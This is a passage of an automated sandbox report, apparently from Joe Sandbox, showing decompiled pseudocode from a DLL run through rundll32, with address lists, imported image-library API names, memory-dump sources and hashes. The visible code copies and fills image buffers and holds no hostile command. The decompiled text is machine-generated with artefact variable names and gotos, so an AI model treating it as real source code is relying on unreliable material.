                                                                      																_t557 =  &(_t557[3]);
                                                                      																_t499 = _t499 + _t435;
                                                                      															}
                                                                      															_t475 = _t474 & 0x00000007;
                                                                      															__eflags = _t475;
                                                                      															if(_t475 != 0) {
                                                                      																_t437 = 0;
                                                                      																__eflags = 0;
                                                                      																do {
                                                                      																	 *(_t499 + _t437) = _t411;
                                                                      																	_t437 = _t437 + 1;
                                                                      																	__eflags = _t437 - _t475;
                                                                      																} while (_t437 < _t475);
                                                                      															}
                                                                      															_t526 = _t526 +  *(_t557[0x5d]);
                                                                      															_t216 =  &(_t557[0x61]);
                                                                      															 *_t216 = _t557[0x61] - 1;
                                                                      															__eflags =  *_t216;
                                                                      														} while ( *_t216 != 0);
                                                                      													}
                                                                      												}
                                                                      												goto L77;
                                                                      											}
                                                                      										}
                                                                      									} else {
                                                                      										_t477 =  *(_t545 + 4) & 0x000000ff;
                                                                      										__eflags = _t477;
                                                                      										if(__eflags == 0) {
                                                                      											L57:
                                                                      											_t557[0xa] = _t545;
                                                                      											_t501 = _t557[0x60];
                                                                      											_t548 = 0;
                                                                      											_t528 = _t557[0xd];
                                                                      											while(1) {
                                                                      												_t557[2] = _t548;
                                                                      												_t557[1] = _t501;
                                                                      												 *_t557 = _t409;
                                                                      												_t336 = E10021480(__eflags);
                                                                      												 *(_t557 + 0x60 + _t548 * 4) = _t336;
                                                                      												__eflags = _t336;
                                                                      												if(_t336 < 0) {
                                                                      													goto L60;
                                                                      												}
                                                                      												_t548 = _t548 + 1;
                                                                      												__eflags = _t528 - _t548;
                                                                      												if(__eflags <= 0) {
                                                                      													_t549 = _t557[0xa];
                                                                      													__eflags = _t557[0x5c];
                                                                      													if(_t557[0x5c] == 0) {
                                                                      														L77:
                                                                      														_t332 = 0;
                                                                      														__eflags = 0;
                                                                      													} else {
                                                                      														_t557[0x13] = _t549;
                                                                      														__eflags = 0;
                                                                      														_t557[0xe] =  &(_t557[0x34]);
                                                                      														_t557[0xa] = 0;
                                                                      														do {
                                                                      															_t338 = _t557[0xa];
                                                                      															_t557[0xf] =  *(_t557 + 0x60 + _t338 * 4);
                                                                      															_t550 =  *(_t557[0x5c] + _t338 * 4);
                                                                      															__eflags = _t338 - 1 - 1;
                                                                      															if(_t338 - 1 <= 1) {
                                                                      																_t439 =  *(_t557[0x13] + 6) & 0x000000ff;
                                                                      																_t342 = 1 << _t439;
                                                                      															} else {
                                                                      																_t342 = 1;
                                                                      																_t439 = 0;
                                                                      																__eflags = 0;
                                                                      															}
                                                                      															_t344 = _t342 + _t557[0x61] - 1 >> _t439;
                                                                      															_t557[0xc] = _t344;
                                                                      															__eflags = _t344;
                                                                      															if(_t344 > 0) {
                                                                      																_t413 =  *(_t557 + 0x50 + _t557[0xa] * 4);
                                                                      																_t347 = _t557[0xf];
                                                                      																_t557[0xb] = _t413;
                                                                      																__eflags = _t347 - _t413;
                                                                      																_t533 =  >  ? _t413 : _t347;
                                                                      																_t557[0x10] = _t533;
                                                                      																_t348 = _t347 - _t533;
                                                                      																__eflags = _t348;
                                                                      																_t557[0x11] = _t348;
                                                                      																do {
                                                                      																	_t534 = _t557[0xb];
                                                                      																	__eflags = _t534;
                                                                      																	if(_t534 != 0) {
                                                                      																		_t350 = _t557[0xe];
                                                                      																		_t479 =  *_t350 & 0x000000ff;
                                                                      																		_t440 =  &(_t350[_t534]);
                                                                      																		while(1) {
                                                                      																			__eflags =  *_t350 - _t479;
                                                                      																			if( *_t350 != _t479) {
                                                                      																				break;
                                                                      																			}
                                                                      																			_t350 =  &(_t350[1]);
                                                                      																			__eflags = _t440 - _t350;
                                                                      																			if(_t440 == _t350) {
                                                                      																				L102:
                                                                      																				_t351 = _t557[0xf];
                                                                      																				_t502 = _t550;
                                                                      																				__eflags = _t351 - 8;
                                                                      																				_t414 = _t351;
                                                                      																				if(_t351 >= 8) {
                                                                      																					_t352 = _t479 * 0x1010101;
                                                                      																					__eflags = _t550 & 0x00000001;
                                                                      																					if((_t550 & 0x00000001) != 0) {
                                                                      																						 *_t550 = _t352;
                                                                      																						_t502 = _t550 + 1;
                                                                      																						_t414 = _t557[0xf] - 1;
                                                                      																					}
                                                                      																					__eflags = _t502 & 0x00000002;
                                                                      																					if((_t502 & 0x00000002) != 0) {
                                                                      																						 *_t502 = _t352;
                                                                      																						_t414 = _t414 - 2;
                                                                      																						_t502 = _t502 + 2;
                                                                      																					}
                                                                      																					__eflags = _t502 & 0x00000004;
                                                                      																					if((_t502 & 0x00000004) != 0) {
                                                                      																						 *_t502 = _t352;
                                                                      																						_t414 = _t414 - 4;
                                                                      																						_t502 = _t502 + 4;
                                                                      																					}
                                                                      																					_t441 = _t414;
                                                                      																					_t414 = _t414 & 0x00000003;
                                                                      																					_t442 = _t441 >> 2;
                                                                      																					memset(_t502, _t352, _t442 << 2);
                                                                      																					_t557 =  &(_t557[3]);
                                                                      																					_t502 = _t502 + _t442;
                                                                      																				}
                                                                      																				_t413 = _t414 & 0x00000007;
                                                                      																				__eflags = _t413;
                                                                      																				if(_t413 != 0) {
                                                                      																					_t354 = 0;
                                                                      																					__eflags = 0;
                                                                      																					do {
                                                                      																						 *(_t502 + _t354) = _t479;
                                                                      																						_t354 = _t354 + 1;
                                                                      																						__eflags = _t354 - _t413;
                                                                      																					} while (_t354 < _t413);
                                                                      																				}
                                                                      																			} else {
                                                                      																				continue;
                                                                      																			}
                                                                      																			goto L99;
                                                                      																		}
                                                                      																		__eflags = _t557[0xb] - 1;
                                                                      																		if(_t557[0xb] == 1) {
                                                                      																			goto L102;
                                                                      																		} else {
                                                                      																			_t355 = _t557[0x10];
                                                                      																			_t503 = _t550;
                                                                      																			_t537 = _t557[0xe];
                                                                      																			__eflags = _t355 - 8;
                                                                      																			_t444 = _t355;
                                                                      																			if(_t355 >= 8) {
                                                                      																				__eflags = _t550 & 0x00000001;
                                                                      																				if((_t550 & 0x00000001) != 0) {
                                                                      																					_t356 =  *_t537 & 0x000000ff;
                                                                      																					_t503 = _t550 + 1;
                                                                      																					_t537 = _t537 + 1;
                                                                      																					_t557[0x12] = _t356;
                                                                      																					 *_t550 = _t356;
                                                                      																					_t444 = _t557[0x10] - 1;
                                                                      																				}
                                                                      																				__eflags = _t503 & 0x00000002;
                                                                      																				if((_t503 & 0x00000002) != 0) {
                                                                      																					_t358 =  *_t537 & 0x0000ffff;
                                                                      																					_t503 = _t503 + 2;
                                                                      																					_t537 = _t537 + 2;
                                                                      																					_t444 = _t444 - 2;
                                                                      																					 *(_t503 - 2) = _t358;
                                                                      																				}
                                                                      																				__eflags = _t503 & 0x00000004;
                                                                      																				if((_t503 & 0x00000004) != 0) {
                                                                      																					_t364 =  *_t537;
                                                                      																					_t503 = _t503 + 4;
                                                                      																					_t537 = _t537 + 4;
                                                                      																					_t444 = _t444 - 4;
                                                                      																					 *(_t503 - 4) = _t364;
                                                                      																				}
                                                                      																			}
                                                                      																			memcpy(_t503, _t537, _t444);
                                                                      																			_t557 =  &(_t557[3]);
                                                                      																			_t557[2] = _t557[0x11];
                                                                      																			_t361 = _t557[0x10];
                                                                      																			_t557[1] = _t361;
                                                                      																			_t362 = _t361 + _t550;
                                                                      																			__eflags = _t362;
                                                                      																			 *_t557 = _t362;
                                                                      																			L10029830(_t413, _t537 + _t444 + _t444, _t537);
                                                                      																		}
                                                                      																	}
                                                                      																	L99:
                                                                      																	_t550 = _t550 +  *((intOrPtr*)(_t557[0x5d] + _t557[0xa] * 4));
                                                                      																	_t267 =  &(_t557[0xc]);
                                                                      																	 *_t267 = _t557[0xc] - 1;
                                                                      																	__eflags =  *_t267;
                                                                      																} while ( *_t267 != 0);
                                                                      															}
                                                                      															_t557[0xa] = _t557[0xa] + 1;
                                                                      															_t557[0xe] = _t557[0xe] + 0x20;
                                                                      															__eflags = _t557[0xd] - _t557[0xa];
                                                                      														} while (_t557[0xd] > _t557[0xa]);
                                                                      														_t332 = 0;
                                                                      													}
                                                                      													return _t332;
                                                                      												} else {
                                                                      													continue;
                                                                      												}
                                                                      												goto L121;
                                                                      											}
                                                                      											goto L60;
                                                                      										} else {
                                                                      											_t365 =  *(_t545 + 0x14);
                                                                      											__eflags = _t365;
                                                                      											_t447 =  >=  ? _t365 : 0;
                                                                      											__eflags = _t365 - 0x20;
                                                                      											 *((intOrPtr*)(_t557 + 0x50 +  *(_t545 + 0x10) * 4)) =  >=  ? _t365 : 0;
                                                                      											if(_t365 > 0x20) {
                                                                      												goto L60;
                                                                      											} else {
                                                                      												__eflags = _t477 - 1;
                                                                      												if(__eflags == 0) {
                                                                      													L45:
                                                                      													_t557[0x5e] = _t409;
                                                                      													_t557[0xa] = _t545;
                                                                      													_t367 = _t557[0xa];
                                                                      													_t557[0xc] = __eflags == 0;
                                                                      													_t145 = _t545 + 0x10; // 0x10
                                                                      													_t538 = _t145;
                                                                      													__eflags = _t557[0x5f] - 2;
                                                                      													_t557[0xe] = _t367;
                                                                      													_t507 = 0;
                                                                      													_t369 = (_t367 & 0xffffff00 | _t557[0x5f] != 0x00000002) & _t557[0xc] & 0x000000ff;
                                                                      													__eflags = _t369;
                                                                      													_t557[0xb] = _t369;
                                                                      													while(1) {
                                                                      														_t449 = _t538[4];
                                                                      														asm("cdq");
                                                                      														_t372 =  *(_t557 + 0x50 +  *_t538 * 4) / _t538[1];
                                                                      														_t557[0x20] = 0;
                                                                      														_t557[0x21] = 0;
                                                                      														__eflags = _t449 - 0x10;
                                                                      														_t557[0x22] = 0;
                                                                      														_t557[0x23] = 0;
                                                                      														if(_t449 > 0x10) {
                                                                      															goto L60;
                                                                      														}
                                                                      														__eflags = _t449 - 7;
                                                                      														if(_t449 > 7) {
                                                                      															L49:
                                                                      															__eflags = _t372;
                                                                      															if(_t372 <= 0) {
                                                                      																goto L60;
                                                                      															} else {
                                                                      																__eflags = _t507;
                                                                      																if(_t507 != 0) {
                                                                      																	L61:
                                                                      																	_t199 = _t507 - 1; // -1
                                                                      																	_t417 = 0;
                                                                      																	__eflags = _t199 - 1;
                                                                      																	if(_t199 <= 1) {
                                                                      																		__eflags = _t557[0xe];
                                                                      																		if(_t557[0xe] == 0) {
                                                                      																			_t417 = 0x00000080 << _t449 - 0x00000008 & 0x0000ffff;
                                                                      																		}
                                                                      																	} else {
                                                                      																		__eflags = _t507 - 3;
                                                                      																		if(_t507 == 3) {
                                                                      																			_t417 = (0x00000001 << _t449) - 0x00000001 & 0x0000ffff;
                                                                      																		}
                                                                      																	}
                                                                      																} else {
                                                                      																	__eflags = _t557[0xb];
                                                                      																	if(_t557[0xb] == 0) {
                                                                      																		goto L61;
                                                                      																	} else {
                                                                      																		_t425 = 0x10 << _t449 - 8;
                                                                      																		__eflags = _t425;
                                                                      																		_t417 = _t425 & 0x0000ffff;
                                                                      																	}
                                                                      																}
                                                                      																_t552 =  &(_t557[0x24]);
                                                                      																_t450 = _t552 + _t372 * 2;
                                                                      																_t484 = _t552;
                                                                      																do {
                                                                      																	 *_t484 = _t417;
                                                                      																	_t484 =  &(_t484[0]);
                                                                      																	__eflags = _t450 - _t484;
                                                                      																} while (_t450 != _t484);
                                                                      																_t418 = _t557[0xa];
                                                                      																_t538 =  &(_t538[5]);
                                                                      																_t557[7] = _t372;
                                                                      																_t557[5] = 0;
                                                                      																_t557[0x1c] =  &(_t557[0x34]);
                                                                      																_t557[4] = 0;
                                                                      																_t557[0x1d] =  &(_t557[0x3c]);
                                                                      																_t557[2] =  &(_t557[0x20]);
                                                                      																_t557[0x1e] =  &(_t557[0x44]);
                                                                      																_t557[6] = _t507;
                                                                      																_t507 = _t507 + 1;
                                                                      																_t557[1] =  &(_t557[0x1c]);
                                                                      																_t557[3] = _t418;
                                                                      																 *_t557 = _t552;
                                                                      																_t557[0x1f] =  &(_t557[0x4c]);
                                                                      																E10034210();
                                                                      																__eflags = ( *(_t418 + 4) & 0x000000ff) - _t507;
                                                                      																if(__eflags > 0) {
                                                                      																	continue;
                                                                      																} else {
                                                                      																	_t545 = _t557[0xa];
                                                                      																	_t409 = _t557[0x5e];
                                                                      																	goto L57;
                                                                      																}
                                                                      															}
                                                                      														} else {
                                                                      															__eflags = _t557[0xc];
                                                                      															if(_t557[0xc] != 0) {
                                                                      																goto L60;
                                                                      															} else {
                                                                      																goto L49;
                                                                      															}
                                                                      														}
                                                                      														goto L121;
                                                                      													}
                                                                      													goto L60;
                                                                      												} else {
                                                                      													_t453 =  *(_t545 + 0x24);
                                                                      													_t508 =  *((intOrPtr*)(_t545 + 0x28));
                                                                      													_t379 =  *((intOrPtr*)(_t557 + 0x50 + _t453 * 4));
                                                                      													__eflags = _t379 - _t508;
                                                                      													_t380 =  <  ? _t508 : _t379;
                                                                      													 *((intOrPtr*)(_t557 + 0x50 + _t453 * 4)) = _t380;
                                                                      													__eflags = _t380 - 0x20;
                                                                      													if(_t380 > 0x20) {
                                                                      														goto L60;
                                                                      													} else {
                                                                      														__eflags = _t477 - 2;
                                                                      														if(__eflags == 0) {
                                                                      															goto L45;
                                                                      														} else {
                                                                      															_t454 =  *(_t545 + 0x38);
                                                                      															_t509 =  *((intOrPtr*)(_t545 + 0x3c));
                                                                      															_t381 =  *((intOrPtr*)(_t557 + 0x50 + _t454 * 4));
                                                                      															__eflags = _t381 - _t509;
                                                                      															_t382 =  <  ? _t509 : _t381;
                                                                      															 *((intOrPtr*)(_t557 + 0x50 + _t454 * 4)) = _t382;
                                                                      															__eflags = _t382 - 0x20;
                                                                      															if(_t382 > 0x20) {
                                                                      																goto L60;
                                                                      															} else {
                                                                      																__eflags = _t477 - 3;
                                                                      																if(__eflags == 0) {
                                                                      																	goto L45;
                                                                      																} else {
                                                                      																	_t489 =  *(_t545 + 0x4c);
                                                                      																	_t455 =  *((intOrPtr*)(_t545 + 0x50));
                                                                      																	_t383 =  *((intOrPtr*)(_t557 + 0x50 + _t489 * 4));
                                                                      																	__eflags = _t383 - _t455;
                                                                      																	_t384 =  <  ? _t455 : _t383;
                                                                      																	 *((intOrPtr*)(_t557 + 0x50 + _t489 * 4)) = _t384;
                                                                      																	__eflags = _t384 - 0x20;
                                                                      																	if(__eflags > 0) {
                                                                      																		goto L60;
                                                                      																	} else {
                                                                      																		goto L45;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					} else {
                                                                      						_t456 = 0;
                                                                      						_t555[0x22] = _t519;
                                                                      						_t539 = 0xffffffff;
                                                                      						_t555[0x13] = _t543;
                                                                      						_t555[0xe] = _t555[0x23];
                                                                      						_t386 = 1;
                                                                      						_t555[0x11] =  ~(_t555[0x27]);
                                                                      						while(1) {
                                                                      							_t388 = _t386 + _t555[0x26] - 1 >> _t456;
                                                                      							_t429 = _t555[0x22][4 + _t539 * 4];
                                                                      							_t555[0xc] = _t388;
                                                                      							if(_t388 <= 0) {
                                                                      								goto L18;
                                                                      							}
                                                                      							_t553 =  *(_t555 + 0x54 + _t539 * 4);
                                                                      							_t555[0x10] = _t539;
                                                                      							_t555[0xb] = 0;
                                                                      							_t398 = _t555[0x20];
                                                                      							_t555[0xd] = _t555[0x11] & _t553 + _t555[0x27] - 0x00000001;
                                                                      							do {
                                                                      								_t458 = _t553;
                                                                      								_t514 = _t398;
                                                                      								_t541 = _t429;
                                                                      								if(_t553 >= 8) {
                                                                      									if((_t398 & 0x00000001) != 0) {
                                                                      										_t514 = _t398 + 1;
                                                                      										_t541 = _t429 + 1;
                                                                      										 *_t398 =  *_t429 & 0x000000ff;
                                                                      										_t458 = _t553 - 1;
                                                                      									}
                                                                      									if((_t514 & 0x00000002) != 0) {
                                                                      										_t494 =  *_t541 & 0x0000ffff;
                                                                      										_t514 = _t514 + 2;
                                                                      										_t541 = _t541 + 2;
                                                                      										_t458 = _t458 - 2;
                                                                      										 *(_t514 - 2) = _t494;
                                                                      									}
                                                                      									if((_t514 & 0x00000004) != 0) {
                                                                      										_t495 =  *_t541;
                                                                      										_t514 = _t514 + 4;
                                                                      										_t541 = _t541 + 4;
                                                                      										_t458 = _t458 - 4;
                                                                      										 *(_t514 - 4) = _t495;
                                                                      									}
                                                                      								}
                                                                      								_t399 = memcpy(_t514, _t541, _t458);
                                                                      								_t555 =  &(_t555[3]);
                                                                      								_t555[0xb] =  &(_t555[0xb][1]);
                                                                      								_t517 = _t555[0xd];
                                                                      								_t398 = _t399 + _t517;
                                                                      								_t429 = _t429 +  *(_t555[0xe]);
                                                                      							} while (_t555[0xc] != _t555[0xb]);
                                                                      							_t539 = _t555[0x10];
                                                                      							_t68 =  &(_t555[0x20]);
                                                                      							 *_t68 = _t555[0x20] + _t555[0xc] * _t517;
                                                                      							__eflags =  *_t68;
                                                                      							L18:
                                                                      							_t539 = _t539 + 1;
                                                                      							__eflags = _t555[0xf] - _t539;
                                                                      							if(_t555[0xf] != _t539) {
                                                                      								__eflags = _t539 - 1;
                                                                      								if(_t539 <= 1) {
                                                                      									_t456 = _t555[0x12][6] & 0x000000ff;
                                                                      									_t386 = 1 << _t456;
                                                                      								} else {
                                                                      									_t386 = 1;
                                                                      									_t456 = 0;
                                                                      									__eflags = 0;
                                                                      								}
                                                                      								_t555[0xe] =  &(_t555[0xe][4]);
                                                                      								continue;
                                                                      							}
                                                                      							_t389 = _t555[0x12];
                                                                      							_t544 = _t555[0x13];
                                                                      							_t540 = _t555[0x22];
                                                                      							__eflags = _t389[8] & 0x00000002;
                                                                      							if((_t389[8] & 0x00000002) != 0) {
                                                                      								_t457 = _t555[0x20];
                                                                      								_t393 = 0;
                                                                      								__eflags = 0;
                                                                      								do {
                                                                      									 *((intOrPtr*)(_t457 + _t393)) =  *((intOrPtr*)(_t540[4] + _t393));
                                                                      									_t393 = _t393 + 4;
                                                                      									__eflags = _t393 - 0x400;
                                                                      								} while (_t393 != 0x400);
                                                                      							}
                                                                      							L28:
                                                                      							return _t544;
                                                                      							goto L121;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				L121:
                                                                      			}

                                                                      0x10023416
                                                                      0x10023421
                                                                      0x10023429
                                                                      0x10023433
                                                                      0x100235df
                                                                      0x100235e9
                                                                      0x100235ed
                                                                      0x100235f0
                                                                      0x100235f8
                                                                      0x10023600
                                                                      0x10023608
                                                                      0x1002360d
                                                                      0x10023620
                                                                      0x10023621
                                                                      0x10023624
                                                                      0x1002362a
                                                                      0x10023631
                                                                      0x10023634
                                                                      0x10023639
                                                                      0x1002363c
                                                                      0x10023645
                                                                      0x10023649
                                                                      0x10023649
                                                                      0x1002364b
                                                                      0x1002364b
                                                                      0x10023652
                                                                      0x10023659
                                                                      0x1002365c
                                                                      0x1002365c
                                                                      0x10023667
                                                                      0x1002366f
                                                                      0x10023677
                                                                      0x1002367d
                                                                      0x10023683
                                                                      0x1002368b
                                                                      0x1002368f
                                                                      0x10023693
                                                                      0x10023698
                                                                      0x1002369b
                                                                      0x100238d1
                                                                      0x100238e0
                                                                      0x100236a1
                                                                      0x100236a1
                                                                      0x100236a3
                                                                      0x00000000
                                                                      0x100236a9
                                                                      0x100236a9
                                                                      0x100236b0
                                                                      0x100236b3
                                                                      0x100236b3
                                                                      0x100236b5
                                                                      0x00000000
                                                                      0x100236bb
                                                                      0x100236c3
                                                                      0x100236c9
                                                                      0x100236cc
                                                                      0x10023930
                                                                      0x1002393c
                                                                      0x10023940
                                                                      0x10023949
                                                                      0x1002394b
                                                                      0x1002394e
                                                                      0x10023951
                                                                      0x10023954
                                                                      0x1002395c
                                                                      0x1002395f
                                                                      0x10023964
                                                                      0x00000000
                                                                      0x10023979
                                                                      0x10023979
                                                                      0x1002397b
                                                                      0x00000000
                                                                      0x10023981
                                                                      0x10023988
                                                                      0x1002398a
                                                                      0x1002399a
                                                                      0x1002399c
                                                                      0x1002399e
                                                                      0x100239a3
                                                                      0x100239a3
                                                                      0x100239b0
                                                                      0x100239b0
                                                                      0x100239b3
                                                                      0x100239b5
                                                                      0x100239b7
                                                                      0x100239f0
                                                                      0x100239f6
                                                                      0x10023a14
                                                                      0x10023a16
                                                                      0x10023a19
                                                                      0x10023a19
                                                                      0x10023a19
                                                                      0x100239f8
                                                                      0x100239fe
                                                                      0x10023a28
                                                                      0x10023a2b
                                                                      0x10023a2e
                                                                      0x10023a2e
                                                                      0x10023a00
                                                                      0x10023a06
                                                                      0x10023a1e
                                                                      0x10023a20
                                                                      0x10023a23
                                                                      0x10023a23
                                                                      0x10023a08
                                                                      0x10023a0a
                                                                      0x10023a0d
                                                                      0x10023a10
                                                                      0x10023a10
                                                                      0x10023a10
                                                                      0x10023a10
                                                                      0x100239b9
                                                                      0x100239b9
                                                                      0x100239bc
                                                                      0x100239be
                                                                      0x100239be
                                                                      0x100239c0
                                                                      0x100239c0
                                                                      0x100239c3
                                                                      0x100239c4
                                                                      0x100239c4
                                                                      0x100239c0
                                                                      0x100239d1
                                                                      0x100239d3
                                                                      0x100239d3
                                                                      0x100239d3
                                                                      0x100239d3
                                                                      0x100239b0
                                                                      0x1002399e
                                                                      0x00000000
                                                                      0x1002398a
                                                                      0x1002397b
                                                                      0x100236d2
                                                                      0x100236d2
                                                                      0x100236d6
                                                                      0x100236d8
                                                                      0x10023898
                                                                      0x10023898
                                                                      0x1002389e
                                                                      0x100238a5
                                                                      0x100238a7
                                                                      0x100238b9
                                                                      0x100238b9
                                                                      0x100238bd
                                                                      0x100238c1
                                                                      0x100238c4
                                                                      0x100238c9
                                                                      0x100238cd
                                                                      0x100238cf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100238b0
                                                                      0x100238b1
                                                                      0x100238b3
                                                                      0x10023a3a
                                                                      0x10023a3e
                                                                      0x10023a40
                                                                      0x100239dc
                                                                      0x100239dc
                                                                      0x100239dc
                                                                      0x10023a42
                                                                      0x10023a42
                                                                      0x10023a4d
                                                                      0x10023a4f
                                                                      0x10023a53
                                                                      0x10023a57
                                                                      0x10023a57
                                                                      0x10023a5f
                                                                      0x10023a6a
                                                                      0x10023a6e
                                                                      0x10023a71
                                                                      0x10023bcb
                                                                      0x10023bd4
                                                                      0x10023a77
                                                                      0x10023a77
                                                                      0x10023a7c
                                                                      0x10023a7c
                                                                      0x10023a7c
                                                                      0x10023a89
                                                                      0x10023a8b
                                                                      0x10023a8f
                                                                      0x10023a91
                                                                      0x10023a9b
                                                                      0x10023a9f
                                                                      0x10023aa3
                                                                      0x10023aa7
                                                                      0x10023aab
                                                                      0x10023aae
                                                                      0x10023ab2
                                                                      0x10023ab2
                                                                      0x10023ab4
                                                                      0x10023ac0
                                                                      0x10023ac0
                                                                      0x10023ac4
                                                                      0x10023ac6
                                                                      0x10023ac8
                                                                      0x10023acc
                                                                      0x10023acf
                                                                      0x10023add
                                                                      0x10023add
                                                                      0x10023adf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10023ad8
                                                                      0x10023ad9
                                                                      0x10023adb
                                                                      0x10023b50
                                                                      0x10023b50
                                                                      0x10023b54
                                                                      0x10023b56
                                                                      0x10023b59
                                                                      0x10023b5b
                                                                      0x10023b6e
                                                                      0x10023b74
                                                                      0x10023b7a
                                                                      0x10023bf0
                                                                      0x10023bf3
                                                                      0x10023bfa
                                                                      0x10023bfa
                                                                      0x10023b7c
                                                                      0x10023b82
                                                                      0x10023be5
                                                                      0x10023be8
                                                                      0x10023beb
                                                                      0x10023beb
                                                                      0x10023b84
                                                                      0x10023b8a
                                                                      0x10023bdb
                                                                      0x10023bdd
                                                                      0x10023be0
                                                                      0x10023be0
                                                                      0x10023b8c
                                                                      0x10023b8e
                                                                      0x10023b91
                                                                      0x10023b94
                                                                      0x10023b94
                                                                      0x10023b94
                                                                      0x10023b94
                                                                      0x10023b5d
                                                                      0x10023b5d
                                                                      0x10023b60
                                                                      0x10023b62
                                                                      0x10023b62
                                                                      0x10023b64
                                                                      0x10023b64
                                                                      0x10023b67
                                                                      0x10023b68
                                                                      0x10023b68
                                                                      0x10023b6c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x10023adb
                                                                      0x10023ae1
                                                                      0x10023ae6
                                                                      0x00000000
                                                                      0x10023ae8
                                                                      0x10023ae8
                                                                      0x10023aec
                                                                      0x10023aee
                                                                      0x10023af2
                                                                      0x10023af5
                                                                      0x10023af7
                                                                      0x10023b98
                                                                      0x10023b9e
                                                                      0x10023c14
                                                                      0x10023c17
                                                                      0x10023c1a
                                                                      0x10023c1b
                                                                      0x10023c1f
                                                                      0x10023c26
                                                                      0x10023c26
                                                                      0x10023ba0
                                                                      0x10023ba6
                                                                      0x10023c02
                                                                      0x10023c05
                                                                      0x10023c08
                                                                      0x10023c0b
                                                                      0x10023c0e
                                                                      0x10023c0e
                                                                      0x10023ba8
                                                                      0x10023bae
                                                                      0x10023bb4
                                                                      0x10023bb6
                                                                      0x10023bb9
                                                                      0x10023bbc
                                                                      0x10023bbf
                                                                      0x10023bbf
                                                                      0x10023bae
                                                                      0x10023afd
                                                                      0x10023afd
                                                                      0x10023b03
                                                                      0x10023b07
                                                                      0x10023b0b
                                                                      0x10023b0f
                                                                      0x10023b0f
                                                                      0x10023b11
                                                                      0x10023b14
                                                                      0x10023b14
                                                                      0x10023ae6
                                                                      0x10023b19
                                                                      0x10023b27
                                                                      0x10023b29
                                                                      0x10023b29
                                                                      0x10023b29
                                                                      0x10023b29
                                                                      0x10023ac0
                                                                      0x10023b2f
                                                                      0x10023b33
                                                                      0x10023b3c
                                                                      0x10023b3c
                                                                      0x10023b46
                                                                      0x10023b46
                                                                      0x100239e8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x100238b3
                                                                      0x00000000
                                                                      0x100236de
                                                                      0x100236de
                                                                      0x100236e6
                                                                      0x100236e8
                                                                      0x100236eb
                                                                      0x100236ee
                                                                      0x100236f2
                                                                      0x00000000
                                                                      0x100236f8
                                                                      0x100236f8
                                                                      0x100236fb
                                                                      0x1002375b
                                                                      0x1002375b
                                                                      0x10023766
                                                                      0x1002376a
                                                                      0x1002376c
                                                                      0x10023776
                                                                      0x10023776
                                                                      0x10023779
                                                                      0x10023781
                                                                      0x10023788
                                                                      0x1002378a
                                                                      0x1002378a
                                                                      0x1002378c
                                                                      0x10023790

                                                                      APIs
                                                                      • mv_image_get_buffer_size.F086 ref: 10023389
                                                                        • Part of subcall function 10023180: mv_pix_fmt_desc_get.F086 ref: 1002319F
                                                                        • Part of subcall function 10023180: mv_image_get_linesize.F086 ref: 100231D4
                                                                        • Part of subcall function 10023180: mv_image_fill_linesizes.F086(?), ref: 10023268
                                                                        • Part of subcall function 10023180: mv_image_fill_plane_sizes.F086(?), ref: 100232CB
                                                                      • mv_pix_fmt_desc_get.F086 ref: 10023393
                                                                      • mv_image_fill_linesizes.F086 ref: 1002342C
                                                                      • mv_log.F086 ref: 10023608
                                                                      • abort.MSVCRT ref: 1002360D
                                                                      • mv_pix_fmt_desc_get.F086 ref: 10023634
                                                                      • mv_pix_fmt_count_planes.F086 ref: 1002363E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_pix_fmt_desc_get$mv_image_fill_linesizes$abortmv_image_fill_plane_sizesmv_image_get_buffer_sizemv_image_get_linesizemv_logmv_pix_fmt_count_planes
                                                                      • String ID: $Assertion %s failed at %s:%d
                                                                      • API String ID: 1281078460-3513380740
                                                                      • Opcode ID: dbf823548c2b124c23c467a487ea1b459a52d23aeb8eabc41e4b7f6b7d08bb56
                                                                      • Instruction ID: fcb8fd15439f2f483d5b17ebb944bfddaf5bb174ad0b20b3751318ef1a6b0b23
                                                                      • Opcode Fuzzy Hash: dbf823548c2b124c23c467a487ea1b459a52d23aeb8eabc41e4b7f6b7d08bb56
                                                                      • Instruction Fuzzy Hash: 1F429A71A083958FC761CF28E48065EBBE1FFC8354F96892EE98997310E771E945CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
